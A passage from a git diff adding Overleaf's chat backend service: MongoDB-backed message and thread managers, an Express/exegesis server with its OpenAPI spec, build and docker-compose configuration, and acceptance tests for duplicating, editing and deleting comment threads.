messages = MessageFormatter.formatMessagesForClientSide(messages) + logger.debug({ projectId, messages }, 'got messages') + res.status(200).setBody(messages) +} + +async function _duplicateCommentThreads(req, res) { + const { projectId } = req.params + const { threads } = req.body + const result = {} + for (const id of threads) { + logger.debug({ projectId, thread: id }, 'duplicating thread') + try { + const { oldRoom, newRoom } = await ThreadManager.duplicateThread( + projectId, + id + ) + await MessageManager.duplicateRoomToOtherRoom(oldRoom._id, newRoom._id) + result[id] = { duplicateId: newRoom.thread_id } + } catch (error) { + if (error instanceof ThreadManager.MissingThreadError) { + // Expected error when the comment has been deleted prior to duplication + result[id] = { error: 'not found' } + } else { + logger.err({ error }, 'error duplicating thread') + result[id] = { error: 'unknown' } + } + } + } + res.json({ newThreads: result }) +} diff --git a/services/chat/app/js/Features/Messages/MessageManager.js b/services/chat/app/js/Features/Messages/MessageManager.js new file mode 100644 index 0000000..efff22a --- /dev/null +++ b/services/chat/app/js/Features/Messages/MessageManager.js @@ -0,0 +1,112 @@ +import { db, ObjectId } from '../../mongodb.js' + +export async function createMessage(roomId, userId, content, timestamp) { + let newMessageOpts = { + content, + room_id: roomId, + user_id: userId, + timestamp, + } + newMessageOpts = _ensureIdsAreObjectIds(newMessageOpts) + const confirmation = await db.messages.insertOne(newMessageOpts) + newMessageOpts._id = confirmation.insertedId + return newMessageOpts +} + +export async function getMessages(roomId, limit, before) { + let query = { room_id: roomId } + if (before) { + query.timestamp = { $lt: before } + } + query = _ensureIdsAreObjectIds(query) + return await db.messages + .find(query) + .sort({ timestamp: -1 }) + .limit(limit) + .toArray() +} + +export async function findAllMessagesInRooms(roomIds) { + return await db.messages + .find({ + room_id: { $in: roomIds }, + }) + .toArray() +} + +export async function deleteAllMessagesInRoom(roomId) { + await db.messages.deleteMany({ + room_id: roomId, + }) +} + +export async function deleteAllMessagesInRooms(roomIds) { + await db.messages.deleteMany({ + 
room_id: { $in: roomIds }, + }) +} + +export async function updateMessage( + roomId, + messageId, + userId, + content, + timestamp +) { + const query = _ensureIdsAreObjectIds({ + _id: messageId, + room_id: roomId, + }) + if (userId) { + query.user_id = new ObjectId(userId) + } + const res = await db.messages.updateOne(query, { + $set: { + content, + edited_at: timestamp, + }, + }) + return res.modifiedCount === 1 +} + +export async function deleteMessage(roomId, messageId) { + const query = _ensureIdsAreObjectIds({ + _id: messageId, + room_id: roomId, + }) + await db.messages.deleteOne(query) +} + +export async function deleteUserMessage(userId, roomId, messageId) { + await db.messages.deleteOne({ + _id: new ObjectId(messageId), + user_id: new ObjectId(userId), + room_id: new ObjectId(roomId), + }) +} + +function _ensureIdsAreObjectIds(query) { + if (query.user_id && !(query.user_id instanceof ObjectId)) { + query.user_id = new ObjectId(query.user_id) + } + if (query.room_id && !(query.room_id instanceof ObjectId)) { + query.room_id = new ObjectId(query.room_id) + } + if (query._id && !(query._id instanceof ObjectId)) { + query._id = new ObjectId(query._id) + } + return query +} + +export async function duplicateRoomToOtherRoom(sourceRoomId, targetRoomId) { + const sourceMessages = await findAllMessagesInRooms([sourceRoomId]) + const targetMessages = sourceMessages.map(comment => { + return _ensureIdsAreObjectIds({ + room_id: targetRoomId, + content: comment.content, + timestamp: comment.timestamp, + user_id: comment.user_id, + }) + }) + await db.messages.insertMany(targetMessages) +} diff --git a/services/chat/app/js/Features/Threads/ThreadManager.js b/services/chat/app/js/Features/Threads/ThreadManager.js new file mode 100644 index 0000000..5697b39 --- /dev/null +++ b/services/chat/app/js/Features/Threads/ThreadManager.js @@ -0,0 +1,157 @@ +import { db, ObjectId } from '../../mongodb.js' + +export class MissingThreadError extends Error {} + +export const GLOBAL_THREAD = 'GLOBAL' + +export async function findOrCreateThread(projectId, threadId) { + let query, update + projectId = new ObjectId(projectId.toString()) + if (threadId !== GLOBAL_THREAD) { + threadId = new ObjectId(threadId.toString()) + } + + if (threadId === GLOBAL_THREAD) { + query = { + project_id: projectId, + thread_id: { $exists: false }, + } + update = { + project_id: projectId, + } + } else { + query = { + project_id: projectId, + thread_id: threadId, + } + update = { + project_id: projectId, + thread_id: threadId, + } + } + + const result = await db.rooms.findOneAndUpdate( + query, + { $set: update }, + { upsert: true, returnDocument: 'after' } + ) + return result +} + +export async function findAllThreadRooms(projectId) { + return await db.rooms + .find( + { + project_id: new ObjectId(projectId.toString()), + thread_id: { $exists: true }, + }, + { + thread_id: 1, + resolved: 1, + } + ) + .toArray() +} + +export async function findAllThreadRoomsAndGlobalThread(projectId) { + return await db.rooms + .find( + { + project_id: new ObjectId(projectId.toString()), + }, + { + thread_id: 1, + resolved: 1, + } + ) + .toArray() +} + +export async function resolveThread(projectId, threadId, userId) { + await db.rooms.updateOne( + { + project_id: new ObjectId(projectId.toString()), + thread_id: new ObjectId(threadId.toString()), + }, + { + $set: { + resolved: { + user_id: userId, + ts: new Date(), + }, + }, + } + ) +} + +export async function reopenThread(projectId, threadId) { + await db.rooms.updateOne( + { + project_id: new 
ObjectId(projectId.toString()),
+      thread_id: new ObjectId(threadId.toString()),
+    },
+    {
+      $unset: {
+        resolved: true,
+      },
+    }
+  )
+}
+
+export async function deleteThread(projectId, threadId) {
+  const room = await findOrCreateThread(projectId, threadId)
+  await db.rooms.deleteOne({
+    _id: room._id,
+  })
+  return room._id
+}
+
+export async function deleteAllThreadsInProject(projectId) {
+  await db.rooms.deleteMany({
+    project_id: new ObjectId(projectId.toString()),
+  })
+}
+
+export async function getResolvedThreadIds(projectId) {
+  const resolvedThreadIds = await db.rooms
+    .find(
+      {
+        project_id: new ObjectId(projectId),
+        thread_id: { $exists: true },
+        resolved: { $exists: true },
+      },
+      { projection: { thread_id: 1 } }
+    )
+    .map(record => record.thread_id.toString())
+    .toArray()
+  return resolvedThreadIds
+}
+
+export async function duplicateThread(projectId, threadId) {
+  const room = await db.rooms.findOne({
+    project_id: new ObjectId(projectId),
+    thread_id: new ObjectId(threadId),
+  })
+  if (!room) {
+    throw new MissingThreadError('Trying to duplicate a non-existent thread')
+  }
+  const newRoom = {
+    project_id: room.project_id,
+    thread_id: new ObjectId(),
+  }
+  if (room.resolved) {
+    newRoom.resolved = room.resolved
+  }
+  const confirmation = await db.rooms.insertOne(newRoom)
+  newRoom._id = confirmation.insertedId
+  return { oldRoom: room, newRoom }
+}
+
+export async function findThreadsById(projectId, threadIds) {
+  return await db.rooms
+    .find({
+      project_id: new ObjectId(projectId),
+      thread_id: { $in: threadIds.map(id => new ObjectId(id)) },
+    })
+    .toArray()
+}
diff --git a/services/chat/app/js/mongodb.js b/services/chat/app/js/mongodb.js
new file mode 100644
index 0000000..2ed6e01
--- /dev/null
+++ b/services/chat/app/js/mongodb.js
@@ -0,0 +1,18 @@
+import Metrics from '@overleaf/metrics'
+import Settings from '@overleaf/settings'
+import { MongoClient } from 'mongodb'
+
+export { ObjectId } from 'mongodb'
+
+export const mongoClient = new MongoClient(
+  Settings.mongo.url,
+  Settings.mongo.options
+)
+const mongoDb = mongoClient.db()
+
+export const db = {
+  messages: mongoDb.collection('messages'),
+  rooms: mongoDb.collection('rooms'),
+}
+
+Metrics.mongodb.monitor(mongoClient)
diff --git a/services/chat/app/js/server.js b/services/chat/app/js/server.js
new file mode 100644
index 0000000..80970fc
--- /dev/null
+++ b/services/chat/app/js/server.js
@@ -0,0 +1,51 @@
+import http from 'node:http'
+import metrics from '@overleaf/metrics'
+import logger from '@overleaf/logger'
+import express from 'express'
+import exegesisExpress from 'exegesis-express'
+import path from 'node:path'
+import { fileURLToPath } from 'node:url'
+import * as messagesController from './Features/Messages/MessageHttpController.js'
+
+const __dirname = fileURLToPath(new URL('.', import.meta.url))
+
+logger.initialize('chat')
+metrics.open_sockets.monitor()
+
+metrics.leaked_sockets.monitor(logger)
+
+export async function createServer() {
+  const app = express()
+
+  app.use(metrics.http.monitor(logger))
+  metrics.injectMetricsRoute(app)
+
+  // See https://github.com/exegesis-js/exegesis/blob/master/docs/Options.md
+  const options = {
+    controllers: { messagesController },
+    ignoreServers: true,
+    allowMissingControllers: false,
+  }
+
+  const exegesisMiddleware = await exegesisExpress.middleware(
+    path.resolve(__dirname, '../../chat.yaml'),
+    options
+  )
+
+  // If you have any body parsers, this should go before them.
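+  // exegesis-express validates each request against chat.yaml, then routes it
+  // to the controller module named by the spec's x-exegesis-controller key
+  // (messagesController here), calling the export whose name matches the
+  // operation's operationId. With allowMissingControllers: false, startup
+  // fails fast if any operation in the spec has no matching controller export.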
+ app.use(exegesisMiddleware) + + // Return a 404 + app.use((req, res) => { + res.status(404).json({ message: `Not found` }) + }) + + // Handle any unexpected errors + app.use((err, req, res, next) => { + res.status(500).json({ message: `Internal error: ${err.message}` }) + }) + + const server = http.createServer(app) + return { app, server } +} diff --git a/services/chat/app/js/util/promises.js b/services/chat/app/js/util/promises.js new file mode 100644 index 0000000..fd46c8c --- /dev/null +++ b/services/chat/app/js/util/promises.js @@ -0,0 +1,10 @@ +/** + * Transform an async function into an Express middleware + * + * Any error will be passed to the error middlewares via `next()` + */ +export function expressify(fn) { + return (req, res, next) => { + fn(req, res, next).catch(next) + } +} diff --git a/services/chat/buildscript.txt b/services/chat/buildscript.txt new file mode 100644 index 0000000..1dc88e9 --- /dev/null +++ b/services/chat/buildscript.txt @@ -0,0 +1,9 @@ +chat +--dependencies=mongo +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/services/chat/chat.yaml b/services/chat/chat.yaml new file mode 100644 index 0000000..35ed3d3 --- /dev/null +++ b/services/chat/chat.yaml @@ -0,0 +1,416 @@ +openapi: 3.1.0 +x-stoplight: + id: okoe8mh50pjec +info: + title: chat + version: '1.0' +servers: + - url: 'http://chat:3010' +x-exegesis-controller: messagesController +paths: + '/project/{projectId}/messages': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + get: + summary: Get Global messages + tags: [] + responses: + '201': + description: OK + content: + application/json: + schema: + type: array + items: + $ref: '#/components/schemas/Message' + operationId: getGlobalMessages + description: Get global messages for the project with Project ID provided + parameters: + - schema: + type: string + in: query + name: before + - schema: + type: string + in: query + name: limit + post: + summary: Send Global message + operationId: sendGlobalMessage + responses: + '201': + description: OK + requestBody: + content: + application/json: + schema: + $ref: '#/components/schemas/Message' + examples: + example-1: + value: + user_id: string + content: string + description: 'UserID and Content of the message to be posted. ' + description: Send global message for the project with Project ID provided + '/project/{projectId}/thread/{threadId}/messages': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + post: + summary: Send message + operationId: sendMessage + responses: + '201': + description: Created + description: Add a message to the thread with thread ID provided from the Project with Project ID provided. 
+ requestBody: + content: + application/json: + schema: + $ref: '#/components/schemas/Message' + description: |- + JSON object with : + - user_id: Id of the user + - content: Content of the message + '/project/{projectId}/threads': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + get: + summary: Get Threads + tags: [] + responses: + '200': + description: OK + content: + application/json: + schema: + type: array + items: + $ref: '#/components/schemas/Thread' + examples: {} + '404': + description: Not Found + operationId: getThreads + description: Get the list of threads for the project with Project ID provided + '/project/{projectId}/thread/{threadId}/messages/{messageId}/edit': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + - schema: + type: string + name: messageId + in: path + required: true + post: + summary: Edit message + operationId: editMessage + responses: + '204': + description: No Content + '404': + description: Not Found + requestBody: + content: + application/json: + schema: + type: object + properties: + content: + type: string + user_id: + type: string + readOnly: true + required: + - content + examples: {} + description: |- + JSON object with : + - content: Content of the message to edit + - user_id: Id of the user (optional) + description: | + Update message with Message ID provided from the Thread ID and Project ID provided + '/project/{projectId}/thread/{threadId}/messages/{messageId}': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + - schema: + type: string + name: messageId + in: path + required: true + delete: + summary: Delete message + operationId: deleteMessage + responses: + '204': + description: No Content + description: 'Delete message with Message ID provided, from the Thread with ThreadID and ProjectID provided' + '/project/{projectId}/thread/{threadId}/user/{userId}/messages/{messageId}': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + - schema: + type: string + name: userId + in: path + required: true + - schema: + type: string + name: messageId + in: path + required: true + delete: + summary: Delete message written by a given user + operationId: deleteUserMessage + responses: + '204': + description: No Content + '/project/{projectId}/thread/{threadId}/resolve': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + post: + summary: Resolve Thread + operationId: resolveThread + responses: + '204': + description: No Content + requestBody: + content: + application/json: + schema: + type: object + properties: + user_id: + type: string + required: + - user_id + description: |- + JSON object with : + - user_id: Id of the user. + description: Mark Thread with ThreadID and ProjectID provided owned by the user with UserID provided as resolved. 
+ '/project/{projectId}/thread/{threadId}/reopen': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + post: + summary: Reopen Thread + operationId: reopenThread + responses: + '204': + description: No Content + description: |- + Reopen Thread with ThreadID and ProjectID provided. + i.e unmark it as resolved. + '/project/{projectId}/thread/{threadId}': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + - schema: + type: string + name: threadId + in: path + required: true + delete: + summary: Delete thread + operationId: deleteThread + responses: + '204': + description: No Content + description: Delete thread with ThreadID and ProjectID provided + '/project/{projectId}/resolved-thread-ids': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + get: + summary: Get resolved thread ids + operationId: getResolvedThreadIds + responses: + '200': + description: Resolved thread ids + '/project/{projectId}': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + delete: + summary: Destroy project + operationId: destroyProject + responses: + '204': + description: No Content + description: 'Delete all threads from Project with Project ID provided, and all messages in those threads.' + /status: + get: + summary: Check status + tags: [] + responses: + '200': + description: OK + content: + application/json: + schema: + type: string + description: chat is alive + operationId: getStatus + description: Check that the Chat service is alive + head: + summary: Check status + tags: [] + responses: + '200': + description: OK + content: + application/json: + schema: + type: string + description: chat is alive + operationId: getStatus + description: Check that the Chat service is alive + '/project/{projectId}/duplicate-comment-threads': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + post: + summary: Duplicate comment threads + operationId: duplicateCommentThreads + requestBody: + content: + application/json: + schema: + type: object + properties: + threads: + type: array + items: + type: string + responses: + '200': + content: + application/json: + schema: + type: object + properties: + newThreads: + type: object + description: Mapping of old thread ids to their duplicated thread ids + description: Duplicate a list of comment threads + '/project/{projectId}/generate-thread-data': + parameters: + - schema: + type: string + name: projectId + in: path + required: true + post: + summary: Generate thread data to load into the frontend + operationId: generateThreadData + requestBody: + content: + application/json: + schema: + type: object + properties: + threads: + type: array + items: + type: string + responses: + '200': + content: + application/json: + schema: + type: object + description: Load threads and generate a json blob containing all messages in all the threads +components: + schemas: + Message: + title: Message + x-stoplight: + id: ue9n1vvezlutw + type: object + examples: + - user_id: string + - content: string + properties: + user_id: + type: string + content: + type: string + required: + - user_id + - content + Thread: + title: Thread + x-stoplight: + id: 0ppt3jw4h5bua + type: array + items: + $ref: '#/components/schemas/Message' diff --git a/services/chat/config/settings.defaults.cjs b/services/chat/config/settings.defaults.cjs new file mode 100644 
index 0000000..4b7dc29 --- /dev/null +++ b/services/chat/config/settings.defaults.cjs @@ -0,0 +1,33 @@ +const http = require('node:http') +const https = require('node:https') + +http.globalAgent.keepAlive = false +https.globalAgent.keepAlive = false + +module.exports = { + internal: { + chat: { + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + port: 3010, + }, + }, + + apis: { + web: { + url: `http://${process.env.WEB_HOST || '127.0.0.1'}:${ + process.env.WEB_PORT || 3000 + }`, + user: process.env.WEB_API_USER || 'overleaf', + pass: process.env.WEB_API_PASSWORD || 'password', + }, + }, + + mongo: { + url: + process.env.MONGO_CONNECTION_STRING || + `mongodb://${process.env.MONGO_HOST || '127.0.0.1'}/sharelatex`, + options: { + monitorCommands: true, + }, + }, +} diff --git a/services/chat/docker-compose.ci.yml b/services/chat/docker-compose.ci.yml new file mode 100644 index 0000000..51eb64d --- /dev/null +++ b/services/chat/docker-compose.ci.yml @@ -0,0 +1,52 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + mongo: + condition: service_started + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 diff --git a/services/chat/docker-compose.yml b/services/chat/docker-compose.yml new file mode 100644 index 0000000..b830d25 --- /dev/null +++ b/services/chat/docker-compose.yml @@ -0,0 +1,56 @@ +# This file was auto-generated, do not edit it directly. 
+# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/chat + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/chat + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/chat + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/chat + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + command: npm run --silent test:acceptance + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + diff --git a/services/chat/package.json b/services/chat/package.json new file mode 100644 index 0000000..f3d37eb --- /dev/null +++ b/services/chat/package.json @@ -0,0 +1,49 @@ +{ + "name": "@overleaf/chat", + "description": "The backend API that powers Overleaf chat", + "private": true, + "main": "app.js", + "type": "module", + "scripts": { + "start": "node app.js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "exegesis-express": "^4.0.0", + "express": "^4.21.2", + "mongodb": "6.12.0" + }, + "devDependencies": { + "acorn": "^7.1.1", + "ajv": "^6.12.0", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "request": "^2.88.2", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "timekeeper": "^2.2.0", + "typescript": "^5.0.4" + }, + "version": "1.0.0", + "directories": { + "test": "test" + }, + "keywords": [], + "author": "", + "license": "AGPL-3.0" +} diff --git a/services/chat/test/acceptance/js/CloningCommentThreadsTests.js b/services/chat/test/acceptance/js/CloningCommentThreadsTests.js new file mode 100644 index 0000000..f4adde1 --- /dev/null +++ b/services/chat/test/acceptance/js/CloningCommentThreadsTests.js @@ -0,0 +1,93 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +const user1Id 
= new ObjectId().toString() +const user2Id = new ObjectId().toString() + +async function createCommentThread(projectId, threadId = new ObjectId()) { + const { response: response1 } = await ChatClient.sendMessage( + projectId, + threadId.toString(), + user1Id, + 'message 1' + ) + expect(response1.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.sendMessage( + projectId, + threadId, + user2Id, + 'message 2' + ) + expect(response2.statusCode).to.equal(201) + return threadId.toString() +} + +describe('Cloning comment threads', async function () { + const projectId = new ObjectId().toString() + + before(async function () { + await ChatApp.ensureRunning() + this.thread1Id = await createCommentThread(projectId) + this.thread2Id = await createCommentThread(projectId) + this.thread3Id = await createCommentThread(projectId) + }) + + describe('with non-orphaned threads', async function () { + before(async function () { + const { + response: { body: result, statusCode }, + } = await ChatClient.duplicateCommentThreads(projectId, [this.thread3Id]) + this.result = result + expect(statusCode).to.equal(200) + expect(this.result).to.have.property('newThreads') + this.newThreadId = this.result.newThreads[this.thread3Id].duplicateId + }) + + it('should duplicate threads', function () { + expect(this.result.newThreads).to.have.property(this.thread3Id) + expect(this.result.newThreads[this.thread3Id]).to.have.property( + 'duplicateId' + ) + expect(this.result.newThreads[this.thread3Id].duplicateId).to.not.equal( + this.thread3Id + ) + }) + + it('should not duplicate other threads threads', function () { + expect(this.result.newThreads).to.not.have.property(this.thread1Id) + expect(this.result.newThreads).to.not.have.property(this.thread2Id) + }) + + it('should duplicate the messages in the thread', async function () { + const { + response: { body: threads }, + } = await ChatClient.getThreads(projectId) + function ignoreId(comment) { + return { + ...comment, + id: undefined, + } + } + expect(threads[this.thread3Id].messages.map(ignoreId)).to.deep.equal( + threads[this.newThreadId].messages.map(ignoreId) + ) + }) + + it('should have two separate unlinked threads', async function () { + await ChatClient.sendMessage( + projectId, + this.newThreadId, + user1Id, + 'third message' + ) + const { + response: { body: threads }, + } = await ChatClient.getThreads(projectId) + expect(threads[this.thread3Id].messages.length).to.equal(2) + expect(threads[this.newThreadId].messages.length).to.equal(3) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/DeletingAMessageTests.js b/services/chat/test/acceptance/js/DeletingAMessageTests.js new file mode 100644 index 0000000..9a4a060 --- /dev/null +++ b/services/chat/test/acceptance/js/DeletingAMessageTests.js @@ -0,0 +1,47 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +describe('Deleting a message', async function () { + const projectId = new ObjectId().toString() + const userId = new ObjectId().toString() + const threadId = new ObjectId().toString() + + before(async function () { + await ChatApp.ensureRunning() + }) + + describe('in a thread', async function () { + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + 'first message' + ) + expect(response.statusCode).to.equal(201) + const { response: response2, body: message } = + 
await ChatClient.sendMessage( + projectId, + threadId, + userId, + 'deleted message' + ) + expect(response2.statusCode).to.equal(201) + const { response: response3 } = await ChatClient.deleteMessage( + projectId, + threadId, + message.id + ) + expect(response3.statusCode).to.equal(204) + }) + + it('should then remove the message from the threads', async function () { + const { response, body: threads } = await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].messages.length).to.equal(1) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/DeletingAThreadTests.js b/services/chat/test/acceptance/js/DeletingAThreadTests.js new file mode 100644 index 0000000..c199218 --- /dev/null +++ b/services/chat/test/acceptance/js/DeletingAThreadTests.js @@ -0,0 +1,38 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +describe('Deleting a thread', async function () { + const projectId = new ObjectId().toString() + const userId = new ObjectId().toString() + before(async function () { + await ChatApp.ensureRunning() + }) + + describe('with a thread that is deleted', async function () { + const threadId = new ObjectId().toString() + const content = 'deleted thread message' + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + content + ) + expect(response.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.deleteThread( + projectId, + threadId + ) + expect(response2.statusCode).to.equal(204) + }) + + it('should then not list the thread for the project', async function () { + const { response, body: threads } = await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(Object.keys(threads).length).to.equal(0) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/DestroyingAProjectTests.js b/services/chat/test/acceptance/js/DestroyingAProjectTests.js new file mode 100644 index 0000000..95c6c35 --- /dev/null +++ b/services/chat/test/acceptance/js/DestroyingAProjectTests.js @@ -0,0 +1,66 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +const db = ChatApp.db + +async function getMessage(messageId) { + return await db.messages.findOne({ + _id: new ObjectId(messageId), + }) +} + +describe('Destroying a project', async function () { + const projectId = new ObjectId().toString() + const userId = new ObjectId().toString() + before(async function () { + await ChatApp.ensureRunning() + }) + + describe('with a project that has threads and messages', async function () { + const threadId = new ObjectId().toString() + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + 'destroyed thread message' + ) + expect(response.statusCode).to.equal(201) + this.threadMessageId = response.body.id + const { response: response2 } = await ChatClient.sendGlobalMessage( + projectId, + userId, + 'destroyed global message' + ) + expect(response2.statusCode).to.equal(201) + this.globalThreadMessageId = response2.body.id + + const threadRooms = await db.rooms + .find({ project_id: new ObjectId(projectId) }) + .toArray() + expect(threadRooms.length).to.equal(2) + const threadMessage = await 
getMessage(this.threadMessageId) + expect(threadMessage).to.exist + const globalThreadMessage = await getMessage(this.globalThreadMessageId) + expect(globalThreadMessage).to.exist + + const { response: responseDestroy } = + await ChatClient.destroyProject(projectId) + expect(responseDestroy.statusCode).to.equal(204) + }) + + it('should remove the messages and threads from the database', async function () { + const threadRooms = await db.rooms + .find({ project_id: new ObjectId(projectId) }) + .toArray() + expect(threadRooms.length).to.equal(0) + const threadMessage = await getMessage(this.threadMessageId) + expect(threadMessage).to.be.null + const globalThreadMessage = await getMessage(this.globalThreadMessageId) + expect(globalThreadMessage).to.be.null + }) + }) +}) diff --git a/services/chat/test/acceptance/js/EditingAMessageTests.js b/services/chat/test/acceptance/js/EditingAMessageTests.js new file mode 100644 index 0000000..39f7edb --- /dev/null +++ b/services/chat/test/acceptance/js/EditingAMessageTests.js @@ -0,0 +1,96 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +describe('Editing a message', async function () { + let projectId, userId, threadId + before(async function () { + await ChatApp.ensureRunning() + }) + + describe('in a thread', async function () { + const content = 'thread message' + const newContent = 'updated thread message' + let messageId + beforeEach(async function () { + projectId = new ObjectId().toString() + userId = new ObjectId().toString() + threadId = new ObjectId().toString() + + const { response, body: message } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + content + ) + expect(response.statusCode).to.equal(201) + expect(message.id).to.exist + expect(message.content).to.equal(content) + messageId = message.id + }) + + describe('without user', function () { + beforeEach(async function () { + const { response } = await ChatClient.editMessage( + projectId, + threadId, + messageId, + newContent + ) + expect(response.statusCode).to.equal(204) + }) + + it('should then list the updated message in the threads', async function () { + const { response, body: threads } = + await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].messages.length).to.equal(1) + expect(threads[threadId].messages[0].content).to.equal(newContent) + }) + }) + + describe('with the same user', function () { + beforeEach(async function () { + const { response } = await ChatClient.editMessageWithUser( + projectId, + threadId, + messageId, + userId, + newContent + ) + expect(response.statusCode).to.equal(204) + }) + + it('should then list the updated message in the threads', async function () { + const { response, body: threads } = + await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].messages.length).to.equal(1) + expect(threads[threadId].messages[0].content).to.equal(newContent) + }) + }) + + describe('with another user', function () { + beforeEach(async function () { + const { response } = await ChatClient.editMessageWithUser( + projectId, + threadId, + messageId, + new ObjectId(), + newContent + ) + expect(response.statusCode).to.equal(404) + }) + + it('should then list the old message in the threads', async function () { + const { response, body: threads } = + await ChatClient.getThreads(projectId) + 
